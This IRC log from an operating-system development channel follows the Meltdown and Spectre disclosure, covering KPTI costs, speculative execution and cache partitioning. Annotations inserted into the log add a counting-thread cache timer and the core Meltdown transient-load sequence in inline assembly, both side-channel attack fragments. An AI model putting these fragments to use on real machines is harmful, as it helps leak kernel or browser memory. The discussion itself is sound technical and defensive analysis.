15:04:21 <Griwes> > (There is also a specialized return predictor, according to Intel's optimization manual, but we haven't analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)
15:04:23 <Griwes> jeez
15:06:17 <geist> radens: with PCID i'm thinking it's mostly just going to be additional memory (need a second top level page table for each process) and some additional complexity on every syscall/interrupt
15:06:35 <geist> depending on how expensive the syscall is it may add a substantial amount of time, however
15:06:52 <radens> ah, yes
15:06:57 <geist> say, the whole thing adds a few hundred cycles. well if your syscall path was already 100 cycles, then it just doubled the depth
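(Roughly what the PCID scheme geist describes looks like at the CR3 level: two sets of page tables per process, each tagged with its own PCID, and CR3 bit 63 set so the write doesn't flush that PCID's TLB entries. Requires CR4.PCIDE; the constants and function names here are illustrative, not any particular kernel's.)

    #include <stdint.h>

    #define CR3_NOFLUSH  (1ULL << 63)  /* keep the new PCID's TLB entries */
    #define PCID_KERNEL  1ULL          /* PCID lives in CR3 bits 0-11 */
    #define PCID_USER    2ULL

    static inline void write_cr3(uint64_t val) {
        __asm__ volatile("mov %0, %%cr3" :: "r"(val) : "memory");
    }

    /* syscall/interrupt entry trampoline: switch to the full kernel tables */
    void enter_kernel(uint64_t kernel_pml4_pa) {
        write_cr3(kernel_pml4_pa | PCID_KERNEL | CR3_NOFLUSH);
    }

    /* return to user: switch back to the trimmed user tables */
    void return_to_user(uint64_t user_pml4_pa) {
        write_cr3(user_pml4_pa | PCID_USER | CR3_NOFLUSH);
    }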
15:07:15 <graphitemaster> fuchsia is going to take a big hit, considering it's a microkernel; the kernel <-> user space context switch rate is much higher than in a monolithic design
15:07:21 <cr1901_modern> geist: "you'd probably still want to dump the BTB though, i suspect. which is non free" AFAIK, TLB also needs to be flushed on syscall entry/exit anyway?
15:07:21 <heat> geist: What about system calls though? How would they access memory?
15:07:25 <graphitemaster> I'd say a 40 to 50% performance hit in your case
15:08:23 <Griwes> okay, midnight is definitely not the time when I'll understand variant 2
15:08:37 <Griwes> at least not by reading the project0 blog post
15:09:26 <graphitemaster> why should we be worried about it tho
15:09:47 <Griwes> what are you asking about, specifically
15:10:06 <radens> The perf increase or leaking arbitrary kernel addresses or leaking kernel memory?
15:10:17 <doug16k> is any of this feasible with rdtsc disabled in user mode?
15:10:26 <geist> cr1901_modern: the point is to use PCID or ASID to avoid the TLB dump
15:10:28 <graphitemaster> like in the case for fuchsia, by the time they get anything out for commercial use, all the silicon will be fixed :P
15:10:36 <geist> heat: you context switch
15:11:08 <heat> geist: Yeah but system calls need to access user memory as well?
15:11:09 <graphitemaster> doug16k, yes, create a thread, increment in a for loop, time with that
15:11:12 <cr1901_modern> geist: Oh right (most of my q's in here are going to point out that I'm actually pretty shitty w/ MMUs/TLBs)
15:11:35 <graphitemaster> (increment a counter I mean)
15:11:36 <doug16k> graphitemaster, and the RFO cache line ping pong makes a mess of the timing
15:12:09 <graphitemaster> doug16k, sure but it's not as big of a mess to hide the timing difference
15:12:21 <graphitemaster> they already have a PoC with webworkers in JS doing this btw
15:12:24 <radens> doug16k: won't it be fine if it's on the same logical core?
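(The counting-thread timer graphitemaster is describing, as a C/pthreads sketch: with rdtsc disabled, a sibling thread spinning on a shared counter still gives enough resolution to tell a cache hit from a miss. Names are illustrative.)

    #include <pthread.h>
    #include <stdint.h>

    static volatile uint64_t ticks;   /* free-running software clock */

    static void *counter_thread(void *arg) {
        (void)arg;
        for (;;) ticks++;
        return NULL;
    }

    void start_timer(void) {
        pthread_t t;
        pthread_create(&t, NULL, counter_thread, NULL);
    }

    /* time one load: the tick delta across the access separates
       cache hits from misses */
    uint64_t time_load(const volatile uint8_t *p) {
        uint64_t t0 = ticks;
        (void)*p;
        return ticks - t0;
    }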
15:13:29 <graphitemaster> how big of a hit would it be if we outright disabled speculative execution on CPUs
15:13:39 <doug16k> massive hit
15:13:40 <graphitemaster> that's a microcode reachable thing
15:14:04 <graphitemaster> anyone have some educated guesses on how massive of a hit?
15:14:18 --- quit: uvgroovy (Quit: uvgroovy)
15:14:43 <doug16k> basically every instruction is serializing?
15:14:49 <graphitemaster> yes
15:15:05 <doug16k> the cpu would idle at every cache miss
15:15:05 <Griwes> lol disabling speculative execution
15:15:18 <cr1901_modern> I would've figured a good branch predictor would mitigate mispredict cost even in a deep pipeline. Doesn't stop a mispredict from being _bad_ though
15:15:33 <geist> i did note that these tests were not done on a Ryzen. hopefully AMD didn't introduce the same bug with their core redesign
15:16:17 <graphitemaster> I want numbers :P
15:16:48 <graphitemaster> I don't want a "a massive hit" because that really doesn't mean anything.
15:17:00 <cr1901_modern> Actually, are speculative execution/branch prediction orthogonal?
15:17:06 <doug16k> graphitemaster, go look at the latencies of instructions, that's how many cycles everything would take. zero overlap
15:17:16 <graphitemaster> doug16k, and that's a bad thing how?
15:17:18 <Griwes> cr1901_modern, ...not really
15:17:23 <graphitemaster> most code avoids high latency instructions anyways
15:17:29 <Griwes> what do you predict if you're not executing forward?
15:17:31 <graphitemaster> and similarly, lots of code uses SIMD
15:17:32 <doug16k> graphitemaster, right now it overlaps a ton
15:17:43 <cr1901_modern> Griwes: You do _both_ branches?
15:17:48 --- quit: daniele_athome (Ping timeout: 256 seconds)
15:17:49 <graphitemaster> doug16k, rough estimate, 400% slower?
15:17:55 <cr1901_modern> at once, and then discard the one that was incorrect
15:18:07 <svk> geist, spectre was successful on ryzen, see 4.1, on meltdown they were unsuccessful "on several AMD CPUs"
15:18:08 <Griwes> ah
15:18:12 <Griwes> I see what you mean
15:18:24 --- join: daniele_athome (~daniele_a@93-40-14-81.ip36.fastwebnet.it) joined #osdev
15:18:25 <Griwes> I'm not sure how feasible that is though
15:18:32 --- quit: inode (Quit: )
15:18:42 <cr1901_modern> I thought that's what speculative execution did
15:19:04 <graphitemaster> you predict in a tree shape
15:19:08 <Griwes> there's a gigantic amount of branches that you hit constantly and I don't see how it'd ever work with the performance it currently has without branch prediction
15:19:08 <graphitemaster> both branches are taken
15:19:15 <graphitemaster> and inside each branch if there is more it predicts further
15:19:27 <graphitemaster> if the top leaf fails a branch
15:19:35 <graphitemaster> everything in that leaf is a failed predict
15:19:37 <Griwes> but at some point you have to make a decision, because you don't have an unlimited number of pipelines to speculatively execute the branches
15:19:38 <doug16k> graphitemaster, at least. what would be the point of parallel decode if it can only do one instruction at a time? it would be as if you went back to an 80486 with a better FPU
15:20:03 <cr1901_modern> Griwes: Ahhh right
15:20:10 --- quit: _sfiguser (Quit: Leaving)
15:20:21 <graphitemaster> doug16k, you could still pipeline a lot without speculative execution, you could still schedule in parallel, you could still execute statements out of order and multiple ones in parallel
15:20:29 <graphitemaster> doug16k, you just couldn't ACT on branches speculatively
15:20:41 <graphitemaster> I doubt speculative branch execution would be that significant
15:20:53 <graphitemaster> if disabled
15:21:04 <graphitemaster> it would likely be less than the current PTI patches
15:21:07 <graphitemaster> I'm guessing
15:21:52 <graphitemaster> the only thing that would have to serialize is branches basically
15:21:57 <doug16k> oh you mean speculating through branches? that's not all speculative execution means
15:22:29 <graphitemaster> well the problem with spectre is that it executes speculatively through branches
15:22:36 <graphitemaster> and that's where the leak happens
15:22:51 <doug16k> mainly it means speculating ahead and finding independent dependency chains, that you can start working on while waiting for a cache miss earlier on
15:22:51 --- join: jjuran (~jjuran@c-73-132-80-121.hsd1.md.comcast.net) joined #osdev
15:22:55 <graphitemaster> right
15:23:02 <graphitemaster> I know what it means I just mean if you didn't do that for branches
15:23:10 <graphitemaster> if you disabled that
15:23:24 <graphitemaster> I imagine the performance hit would be less than the current patches attempting to fix the problem
15:23:53 <Griwes> probably
15:24:23 --- quit: because (Ping timeout: 260 seconds)
15:24:31 <doug16k> think so? I'll take fast loop execution over some TLB flushes at syscalls
15:24:43 <Griwes> yeah
15:24:53 <Griwes> I mean I guess it depends on what program you're running
15:25:20 <Griwes> but I'd imagine that branch prediction is significant enough to hurt more when disabled
15:25:38 <graphitemaster> except branch prediction does not rely on speculative
15:25:52 <graphitemaster> branch prediction can still work
15:26:05 <Griwes> what does branch prediction do without speculative exec? prefetch the icache?
15:26:13 <doug16k> you still talking about making branches serializing?
15:26:27 --- quit: dbittman|work (Read error: Connection reset by peer)
15:26:33 --- join: because (ayy@cpe-76-173-133-37.hawaii.res.rr.com) joined #osdev
15:27:01 <graphitemaster> Griwes, basically prefetch into icache, yes
15:27:08 <graphitemaster> and also any data dependencies if it's a loop
15:27:16 <Griwes> I'd imagine that's not very significant
15:27:29 <Griwes> doesn't help with tight loops, for example, since the icache is already populated
15:27:55 <graphitemaster> well speculative execution doesn't really help in loops anyways unless your loop body is small enough that it can be executed before you hit the top again
15:28:16 <graphitemaster> and if your loop body is like that you benefit more from manual unrolling anyways
15:28:53 <cr1901_modern> why not?
15:28:58 <graphitemaster> which compilers do anyways
15:29:04 <clever> ive seen a case where clang ran the entire loop at compile time, because the inputs were constant
15:29:20 --- quit: svk (Ping timeout: 240 seconds)
15:29:25 <clever> so what was originally meant to be an example of how well something could perform a dumb loop, turned into 10 instructions
15:29:45 <graphitemaster> yes compilers are cool
15:29:55 <cr1901_modern> well why doesn't speculative execution really help in loops anyways*?
15:30:07 --- quit: empy (Ping timeout: 252 seconds)
15:30:09 <graphitemaster> I said it only helps if your loop body is small enough
15:30:18 <Griwes> graphitemaster, and what do you suppose I meant by a "tight loop"? :P
15:30:31 <graphitemaster> compilers unroll tight loops
15:30:41 <graphitemaster> because that tends to be better for speculative execution :P
15:31:39 <Griwes> ...unless they failed to do so... :P
15:31:59 <cr1901_modern> graphitemaster: Well why does it only help if the loop body is small enough :P?
15:32:01 <Griwes> relying on the compiler to always be smarter than the CPU is what killed Itanium, remember? :P
15:33:38 <graphitemaster> Itanium died because Itanium was a garbage arch
15:33:44 <graphitemaster> not because compilers were bad
15:33:47 <doug16k> unrolling is bad for the latest processors. if you exceed the size of the microop cache then it has to decode every pass through the loop
15:36:14 <doug16k> in other words, if a loop is short enough, all the potential stalls because of instruction size or decode parallelism disappear, and it can flood the reorder buffer with ops at an extremely high rate
15:36:59 --- quit: floatleft (Read error: Connection reset by peer)
15:39:19 <graphitemaster> doug16k, still a huge micro-opt
15:39:32 <graphitemaster> in the grand scheme of things it would be irrelevant/unmeasurable
15:39:42 <graphitemaster> as a system wide sort of metric
15:39:50 <graphitemaster> only matters in microbench and synthetic workloads
15:44:43 --- quit: xenos1984 (Quit: Leaving.)
15:45:15 <geist> graphitemaster: *you're* a synthetic workload
15:45:54 <graphitemaster> geist, come at me bro, I'll eat your fucking work lunch.
15:46:05 <graphitemaster> <3
15:47:55 <lava> :]
15:48:00 <lava> now all of you have to implement kaiser
15:48:04 <lava> cheers to you too!
15:48:20 <cr1901_modern> what if I make my OS AMD-only?
15:48:31 <cr1901_modern> (n.b. I don't have one)
15:48:48 <lava> spectre works super nicely on AMD
15:49:03 <lava> colleague sitting at the next desk implemented that
15:49:39 <cr1901_modern> Then why doesn't AMD need the PTI code?
15:50:03 --- join: alphawarr1or (uid243905@gateway/web/irccloud.com/x-omorthaujhnhropf) joined #osdev
15:50:17 <Griwes> because they do the appropriate privilege checks for memory accesses during speculative execution
15:50:38 <jjuran> https://googleprojectzero.blogspot.co.uk/2018/01/reading-privileged-memory-with-side.html
15:50:39 <bslsk05> ​googleprojectzero.blogspot.co.uk: Project Zero: Reading privileged memory with a side-channel
15:50:41 <cr1901_modern> I thought that's what kaiser did?
15:50:55 <cr1901_modern> s/did/protected against/
15:51:00 <Griwes> kaiser is pti
15:51:23 <Griwes> normally you can't do a load on something not marked user accessible, but apparently, speculative execution could
15:51:28 <cr1901_modern> So AMD doesn't need the performance-crushing patch
15:51:40 <Griwes> that's how it seems to be right now
15:52:03 <cr1901_modern> And spectre isn't fixed by kaiser AIUI
15:52:48 <Griwes> I can't see how it can be fixed, other than by disabling speculative execution and/or branch prediction (still a little fuzzy on the and/or)
15:53:28 <cr1901_modern> (6:48:26 PM) lava: spectre works super nicely on AMD
15:54:07 --- quit: immersive (Quit: bye)
15:55:26 --- join: clickjack (~clickjack@90.95.19.47) joined #osdev
15:56:15 --- quit: jsgrant_ (Remote host closed the connection)
15:56:35 --- join: jsgrant_ (~jsgrant@71-11-142-172.dhcp.stls.mo.charter.com) joined #osdev
15:56:44 <lava> KPTI/Kaiser protects against Meltdown
15:56:46 <lava> not spectre
15:56:51 <lava> spectre works everywhere
15:56:54 <lava> basically
15:57:01 <Griwes> yes
15:57:27 <lava> meltdown only works if you can perform operations based on register values that are illegally fetched into the register temporarily
15:58:12 <Griwes> from what I understand, meltdown is literally spectre, but doing cross-ring reads because Intel people are badlets
15:59:05 --- quit: jsgrant_ (Remote host closed the connection)
16:00:17 <lava> from what I understand meltdown is just pipelining + a race condition for the privilege check
16:00:37 <lava> spectre is pipelining + branch prediction
16:00:42 <lava> so it's not the same
16:04:36 <froggey> lava: nice work
16:05:03 <lava> https://twitter.com/misc0110/status/948706387491786752
16:05:03 <bslsk05> ​twitter: <misc0110> Using #Meltdown to steal passwords in real time #intelbug #kaiser #kpti /cc @mlqxyz @lavados @StefanMangard @yuvalyarom https://meltdownattack.com/ https://video.twimg.com/tweet_video/DSp7SbVXcAAQ7FC.mp4
16:08:37 --- quit: sortie (Quit: Leaving)
16:09:46 <latentprion> Yuval is a cool guy
16:09:59 <latentprion> Really brilliant security guy -- from Israel of course
16:20:23 --- quit: ingrix (Ping timeout: 260 seconds)
16:20:55 --- join: MDude (~MDude@73.187.225.46) joined #osdev
16:21:05 --- join: MDead (~MDude@c-73-187-225-46.hsd1.pa.comcast.net) joined #osdev
16:21:07 --- join: MDead_ (~MDude@c-73-187-225-46.hsd1.pa.comcast.net) joined #osdev
16:23:14 --- join: MDead__ (~MDude@c-73-187-225-46.hsd1.pa.comcast.net) joined #osdev
16:26:22 --- quit: MDead_ (Ping timeout: 256 seconds)
16:26:22 --- quit: MDude (Ping timeout: 256 seconds)
16:26:22 --- quit: MDead (Ping timeout: 256 seconds)
16:26:30 --- nick: MDead__ -> MDude
16:29:08 --- quit: Nach0z (Ping timeout: 260 seconds)
16:29:25 --- quit: PointlessMan (Quit: Leaving)
16:29:25 <latentprion> What made intel think it was a good idea to speculatively execute, or even fetch at all
16:29:34 <latentprion> Ring0 instructions
16:29:38 <latentprion> From within ring3
16:29:51 <latentprion> What kind of stupidity made them do that?
16:30:56 --- quit: vaibhav (Quit: Leaving)
16:31:16 <Kazinsal> Performance race.
16:35:59 --- join: empy (~l@c-24-56-245-159.customer.broadstripe.net) joined #osdev
16:35:59 --- quit: empy (Changing host)
16:35:59 --- join: empy (~l@unaffiliated/vlrvc2vy) joined #osdev
16:36:46 <Griwes> but it's an incredibly dumb thing to do really
16:37:26 <Griwes> especially since the cost of the privilege check *should* be negligible compared to all the cache prefetching costs that we speculatively execute for
16:38:42 <latentprion> I think that going forward, all processor caches of all types should be isolated, and their isolation boundaries should be documented publicly without fail
16:38:48 <latentprion> Unpartitioned caches are getting stupid
16:39:28 <latentprion> Processors should no longer mix cached data between process boundaries, and should have multiple fast caches, that are hardware partitioned
16:39:42 <latentprion> Gernot Heiser has been complaining about cache partitioning for a long time
16:39:43 --- quit: because (Ping timeout: 264 seconds)
16:40:07 <latentprion> The other solution is to provide proper cache flushing instructions that actually do what they say they do
16:40:33 <latentprion> Because right now, it is actually impossible to rely on cache flushing instructions to do what they say they do
16:41:03 <latentprion> https://ts.data61.csiro.au/publications/csiro_full_text//Ge_YCH_toappear.pdf
16:41:18 --- join: because (ayy@cpe-76-173-133-37.hawaii.res.rr.com) joined #osdev
16:41:42 <latentprion> Basically, all the cache management instructions, especially on intel processors, do not actually work as described and do not enable proper partitioning
16:41:50 <Griwes> okay, so there's two issues here
16:42:17 <Griwes> one is meltdown, which is trivially mitigated by intel not being dumb and actually doing the privilege checks in speculative execution
16:42:40 <Griwes> the other issue is spectre and that is *not* mitigated by separating caches between processes
16:43:00 <Griwes> because you can use it to, say, read arbitrary data from the current process when you're inside a jit
16:43:26 <latentprion> No, I'm talking about the general class of problems created by the fact that processors do not properly implement the cache flushing/partitioning instructions their manuals describe
16:43:38 <latentprion> This leads to unmitigatable timing and side channels
16:43:54 <Griwes> and yet it doesn't mitigate same-process spectre, and the fix for meltdown is easier
16:43:55 <latentprion> It is literally impossible right now to properly eliminate timing channels on intel cpus
16:43:56 --- quit: bauen1 (Read error: Connection reset by peer)
16:44:06 <latentprion> You're missing my larger point
16:44:16 <latentprion> This is a much bigger issue than this current exploit
16:44:28 <latentprion> And it's been well understood for at least 2 years now
16:44:44 --- join: bauen1 (~bauen1@ip5f5bfcbd.dynamic.kabel-deutschland.de) joined #osdev
16:44:52 <latentprion> And there has been no effort from processor manufacturers to give the OS community the power to partition shared hardware resources
16:44:56 <Griwes> and you are missing my point
16:45:04 <latentprion> I brought up *my* point
16:45:05 <Griwes> you haven't proposed a thing that mitigates spectre
16:45:15 <latentprion> And you then started talking about I don't care what
16:45:30 <Griwes> what the...?
16:45:48 <latentprion> The fact that meltdown is just another spinoff of the problem is just a matter of eventuality
16:45:51 <Griwes> you brought a point and I pointed out that it's not really very relevant to the current problem
16:46:15 <latentprion> It is though; I just explained to you that cache partitioning is impossible even though the processors say it should be
16:46:27 <latentprion> If when we published our paper 2 years ago
16:46:31 <latentprion> Intel and ARM had listened to us
16:46:38 <latentprion> Then meltdown would not have occured
16:46:50 <latentprion> This is a problem that has been known about for years
16:47:22 <latentprion> And meltdown is frankly *not* the only problem in this space
16:47:24 <Griwes> okay, more of your points... meltdown is older than 2 years, no?
16:47:56 <Griwes> but again, meltdown is "trivially" mitigated (to the point of AMD not being vulnerable) by doing proper privilege checks
16:47:57 --- part: lijero left #osdev
16:48:12 <latentprion> I've been talking about partitioning either by actually partitioning caches in hardware, *OR* by properly implementing the very cache flushing instructions that intel and ARM claim to have implemented
16:48:18 <latentprion> Which do not work as described
16:48:20 <Griwes> and from what I understand, your proposed approach to this doesn't fix the spectre problem of reading whatever as a JS script
16:48:25 <latentprion> I.e, there is a microcode solution
16:48:35 <latentprion> Which could have been pushed out 2 years ago
16:48:36 <Griwes> please tell me how that fixes meltdown
16:48:41 <Griwes> and then how it fixes spectre
16:48:45 <latentprion> I don't care about specter
16:48:48 <Griwes> and also: this is not a microcode issue
16:48:55 <latentprion> I'm using meltdown as an angle to talk about a much bigger issue
16:49:10 <Griwes> ah, so you just made a point that's only relevant because both are about caches
16:49:23 <latentprion> At the end of the day, timing and side channels require a shared processor resource
16:49:27 <Griwes> and decided to claim that you know all solutions using that?
16:49:33 <latentprion> What are you talking about?
16:49:35 <Griwes> please explain how this fixes meltdown
16:50:06 <Griwes> <latentprion> If when we published our paper 2 years ago, Intel and ARM had listened to us, Then meltdown would not have occured
16:50:10 <Griwes> this is your claim
16:50:18 <Griwes> please explain how you'd've fixed it
16:51:23 <latentprion> If hardened kernels are able to actually use colouring and partitioning to keep data stored inside the processor isolated, then for example, our solution in seL4, which is to basically take advantage of cache colouring and actually colour all of RAM, as well as to flush aggressively
16:52:00 <latentprion> Would have been able to eliminate all channels; Meltdown is relevant because it's a prefetch, and part of the prefetch would have fetched our flush
16:52:08 <latentprion> The flush would have forced a pipeline stall
16:52:23 <latentprion> It's in the same class of problems we've been publishing about for 2 years
16:52:36 <Griwes> how would you flush when you are not the code that's being executed?
16:53:03 <latentprion> Meltdown prefetches instructions into the prefetch buffer
16:53:17 <latentprion> Part of those instructions would have been a flushing instruction
16:53:32 <latentprion> If the processor encounters a flush, even speculatively, it would have to stall the pipeline
16:53:36 <latentprion> Simple
16:54:02 <Griwes> you must be reading about a very different paper than what I'm reading
16:54:38 <latentprion> There are multiple papers; that one brings up the point that there is no consistent way to actually mitigate timing channels on Intel CPUs
16:54:39 --- quit: m_t (Quit: Leaving)
16:54:42 <Griwes> it's not your code that's fetched, it's data from arbitrary addresses due to a piece of code designed to time caching
16:54:44 <latentprion> We made significant progress on ARM
16:54:54 <latentprion> It's not from an arbitrary address
16:54:59 <latentprion> Do you even understand how meltdown works?
16:55:17 <Griwes> I think I do
16:55:25 <latentprion> Meltdown is a problem for KASLR because it allows you to determine the linkage of the kernel based on prefetching into ring0
16:55:31 <Griwes> and all I'm reading makes me more and more confident that I do
16:55:49 <latentprion> The thing that is prefetched allows you to determine where the kernel's SYSENTER/SYSCALL instruction vectors into
16:56:26 <latentprion> From there if you have a kernel image for that version of the kernel, you can use that image to determine the linkage of the rest of the kernel that is in RAM
16:56:54 <latentprion> From there, you can cause the CPU to fetch various bits of data by triggering reads based on the behaviour of different syscalls
16:56:58 <Griwes> that is... not at all what I understand what it is
16:57:25 <latentprion> Speculative instruction fetching is not "arbitrary"
16:57:40 <latentprion> Modern intel CPUs' branch prediction and speculation is usually 90% or more accurate
16:58:06 <latentprion> If the processor is speculatively fetching kernel instructions, it's obviously starting with fetching the kernel's SYSENTER/SYSCALL vector point
16:58:35 --- join: Nach0z (~nach0z@c-24-126-182-195.hsd1.ga.comcast.net) joined #osdev
16:58:35 --- quit: Nach0z (Changing host)
16:58:35 --- join: Nach0z (~nach0z@unaffiliated/nach0z) joined #osdev
16:58:47 <latentprion> From there, as with all other exploits, you engage in some complex set of shenanigans to gain more information and in combination with other techniques, you produce a holistic result
16:58:59 <Griwes> > Finally, we discuss a concrete implementation of Meltdown allowing to dump kernel memory with up to 503 KB/s.
16:59:13 <Griwes> how is this not "arbitrary data"
16:59:34 --- quit: caen23 (Ping timeout: 248 seconds)
16:59:54 <latentprion> I don't recall talking about whatever your paper's publishers chose to fetch with the prefetcher
16:59:58 --- quit: mniip (Ping timeout: 240 seconds)
17:00:02 <latentprion> I'm talking about how the prefetch exploit works
17:00:12 <Griwes> > The core instruction sequence of Meltdown. An inaccessible kernel address is moved to a register, raising an exception. The subsequent instructions are already executed out of order before the exception is raised, leaking the content of the kernel address through the indirect memory access.
17:00:34 <latentprion> Griwes: Are you reading what you're pasting?
17:00:39 <Griwes> yes
17:00:39 <latentprion> That's what I just typed
17:01:15 <Griwes> what I pasted literally says "load the address you want to probe into a register [rcx in this case] and do this to probe it"
17:01:50 <Griwes> > By repeating these steps for different memory locations, the attacker can dump the kernel memory, including the entire physical memory.
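(The core sequence the quote refers to, sketched as GCC inline asm following the paper's listing in spirit; probe_array is an illustrative name. The load of the kernel address will fault, but the dependent probe access is issued out of order before the fault retires.)

    #include <stdint.h>

    void meltdown_probe(const uint8_t *kernel_addr, uint8_t *probe_array) {
        __asm__ volatile(
            "movzbq (%0), %%rax\n\t"          /* illegal load; will raise #PF  */
            "shlq   $12, %%rax\n\t"           /* one 4 KiB page per byte value */
            "movq   (%1,%%rax,1), %%rbx\n\t"  /* transiently caches one line   */
            :
            : "r"(kernel_addr), "r"(probe_array)
            : "rax", "rbx", "memory");
        /* a real PoC survives the fault (signal handler or TSX) and then
           Flush+Reloads probe_array to recover the byte */
    }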
17:02:22 <Griwes> I'm trying to understand how your proposed fixes mitigate this attack
17:02:39 <Griwes> since the discussion prior to your claim was literally about this attack for solid couple of hours
17:03:07 <latentprion> Okay, that's not what I read: the meltdown bug exposes the location of the kernel's linkage by prefetching the kernel's SYSENTER entry point
17:03:22 <latentprion> And then allows for KASLR to be reliably bypassed
17:03:23 <Griwes> ...not according to the meltdown paper
17:03:43 <latentprion> I am not sure about the angle you're describing there
17:04:01 <Griwes> according to the meltdown paper, it allows you to dump the entire memory
17:04:09 --- join: dbittman (~dbittman@2601:647:ca00:1651:b26e:bfff:fe31:5ba2) joined #osdev
17:04:41 <latentprion> If you can speculatively read and then use that as a channel, you can use that to read any amount of data
17:04:47 <Griwes> what you're talking about seems to be a way to interpret the dumped memory, but that's really just a secondary thing
17:04:49 <latentprion> The amount of data you can read is not the problem
17:05:24 <Griwes> the core problem with meltdown is that speculative execution allows you to bypass privilege checks (because they aren't there)
17:05:33 <Griwes> how that is used is truly a derivative problem
17:05:52 <Griwes> and I fail to see how anything you're talking about mitigates this mechanism
17:06:15 <latentprion> Could you link me to the paper you're reading?
17:06:22 <Griwes> https://meltdownattack.com/meltdown.pdf
17:06:25 <latentprion> Thanks
17:06:30 --- quit: awang_ (Ping timeout: 248 seconds)
17:08:20 <Griwes> page 11, 6.1.1 is specifically what I'm talking about
17:09:34 --- join: mniip (mniip@unaffiliated/mniip) joined #osdev
17:09:52 --- quit: Love4Boobies (Remote host closed the connection)
17:10:29 <Griwes> and that is also specifically what AMD is not vulnerable to, since they do privilege checks (as they should)
17:12:21 --- join: Love4Boobies (~L4B@unaffiliated/l4b) joined #osdev
17:13:21 --- quit: Gaudasse (Ping timeout: 240 seconds)
17:13:21 --- quit: reda (Ping timeout: 240 seconds)
17:13:22 --- quit: darthdeus (Ping timeout: 268 seconds)
17:13:42 --- join: Gaudasse (~Gaudasse@bitwise.fr) joined #osdev
17:13:50 --- quit: CustosLimen (Ping timeout: 240 seconds)
17:13:50 --- quit: lxpz (Ping timeout: 240 seconds)
17:15:27 --- join: reda (~reda@unaffiliated/reda) joined #osdev
17:15:39 --- join: CustosLimen (~CustosLim@unaffiliated/cust0slim3n) joined #osdev
17:16:25 --- join: darthdeus (~darthdeus@catsocket.com) joined #osdev
17:16:26 --- join: lxpz (~lxpz@shiki.adnab.me) joined #osdev
17:16:47 --- quit: listenmore (Remote host closed the connection)
17:17:10 --- join: listenmore (~strike@2.27.123.231) joined #osdev
17:18:55 <latentprion> Griwes: Okay, our sources until now had been the LKML and web articles
17:19:10 <latentprion> I wasn't aware there was a published paper by Yuval on it
17:19:35 <Griwes> There's a writeup on project zero's blog on this
17:20:09 <Griwes> It seems they've been forced to disclose since someone made a PoC attack independently today
17:20:24 <latentprion> Yes, the original disclosure date was the 9th
17:24:00 --- join: wcstok (~Me@c-71-197-192-147.hsd1.wa.comcast.net) joined #osdev
17:26:23 --- join: awang_ (~awang@cpe-98-31-27-190.columbus.res.rr.com) joined #osdev
17:31:25 <Kazinsal> PoC works pretty well too
17:31:50 <Kazinsal> https://i.imgur.com/mCVHKwQ.jpg
17:31:57 <Kazinsal> "no page faults required, massaging everything in/out-of the right cache seems to be the crux"
17:32:06 <clever> https://googleprojectzero.blogspot.ca/2018/01/reading-privileged-memory-with-side.html https://developer.arm.com/support/security-update
17:32:07 <bslsk05> ​googleprojectzero.blogspot.ca: Project Zero: Reading privileged memory with a side-channel
17:32:07 <bslsk05> ​developer.arm.com: Arm Processor Security Update – Arm Developer
17:32:13 <clever> these 2 pages have the most info, from what ive seen
17:35:22 --- join: godel (~gonzalo@96-251-231-201.fibertel.com.ar) joined #osdev
17:35:42 <Kazinsal> NT kernel patch is in the wild
17:36:08 <Kazinsal> Results in non-I/O bound workloads and gaming: performance impact within margin of error.
17:41:10 --- quit: peterbjo1nx (Ping timeout: 256 seconds)
17:41:23 --- join: peterbjo1nx (~peterbjor@50709D65.static.ziggozakelijk.nl) joined #osdev
17:42:07 --- quit: peterbjornx (Ping timeout: 264 seconds)
17:42:56 --- join: peterbjornx (~peterbjor@50709D65.static.ziggozakelijk.nl) joined #osdev
17:46:48 --- quit: heat (Remote host closed the connection)
17:50:09 --- quit: Shamar (Quit: Lost terminal)
17:51:31 --- join: rmx86k (~troy1@2605:e000:7c8a:7200:d066:9635:2ea7:9cbb) joined #osdev
17:52:30 --- quit: kasumi-owari (Ping timeout: 256 seconds)
17:54:02 --- join: kasumi-owari (~kasumi-ow@ftth-213-233-237-007.solcon.nl) joined #osdev
17:54:42 --- join: variable (~variable@freebsd/developer/variable) joined #osdev
18:03:14 <Kazinsal> Oh neat someone's got a PoC to side-channel text as it's being typed
18:03:31 <Kazinsal> Computers were a mistake
18:04:40 <variable> +1
18:04:53 <variable> proof: they let me modify them
18:06:09 <geist> https://developer.arm.com/support/security-update turns out at least one of the ARM cores is directly hit by variant 3
18:06:36 <geist> and a new subvariant 3a specific to ARM: speculatively reading from a privileged control register and then using it as a base register in a load
18:07:03 <variable> I wish I was back in academia
18:07:04 <geist> very nice document they put together talking about it all though. go ARM
18:07:30 <Kazinsal> "As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs "
18:07:34 <Kazinsal> JESUS H FUCKING CHRIST
18:08:07 <radens> all your cookies belong to us
18:08:26 <klange> computers were a mistake
18:09:16 <Kazinsal> let's just all go back to the days before integrated circuits
18:09:33 <Kazinsal> don't need no EFI gimme that carburetor
18:09:56 <klange> let's go back to the the days where only code you personally installed (possibly by writing it out of a magazine) runs on your computer
18:10:03 <klange> then the smart people can continue using computers for smart things
18:10:13 <geist> shit man, how about the only code is what you manually input with switches
18:10:16 <klange> and the rest of us can be spared their terribleness
18:10:31 <geist> or back when computers just sit there and computed stuff
18:10:32 --- quit: John__ (Read error: Connection reset by peer)
18:10:52 <radens> and then other smart people will exploit the shitty code you mistyped from a year old magazine.
18:11:07 <geist> yeah but only by coming over to your house and fiddling with the switches
18:11:13 <Kazinsal> when the height of computing technology was using a television transmitter to fuck with german air raid navigation
18:11:14 <geist> since by definition you didn't hook it up to the internets
18:11:50 <Kazinsal> (bonus of going back to that era: we get to beat nazis again)
18:12:56 --- join: lijero (~lijero@unaffiliated/lijero) joined #osdev
18:13:44 <radens> how very nice and straightforward of the arm people.
18:14:12 --- quit: tacco\unfoog ()
18:15:07 --- join: Arcaelyx_ (~Arcaelyx@2601:646:c200:27a1:4558:7f8f:5fbb:1a99) joined #osdev
18:15:44 <Kazinsal> at least the 68k isn't vulnerable
18:17:35 <geist> man these are some pretty hard core changes: https://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux.git/commit/?h=kpti&id=414c3263750481a580fcc9e01d056119bb3a78fb
18:17:35 <bslsk05> ​git.kernel.org: kernel/git/arm64/linux.git - AArch64 Linux kernel port
18:18:18 --- quit: gdh (Quit: Leaving)
18:18:40 --- quit: Arcaelyx (Ping timeout: 255 seconds)
